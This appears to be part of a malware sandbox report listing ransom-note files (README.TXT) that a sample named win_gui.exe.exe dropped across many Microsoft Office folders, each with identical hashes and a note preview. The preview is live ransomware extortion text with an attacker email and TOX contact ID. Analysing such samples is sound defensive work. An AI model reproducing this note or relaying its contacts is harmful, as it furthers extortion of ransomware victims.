                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\AccessWeb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\AugLoop\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\BORDERS\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\Bibliography\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\CONVERT\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\Configuration\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\Document Parts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FORMS\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000006\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000008\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000009\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000011\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000050\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000055\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_FA000000064\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_f14\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
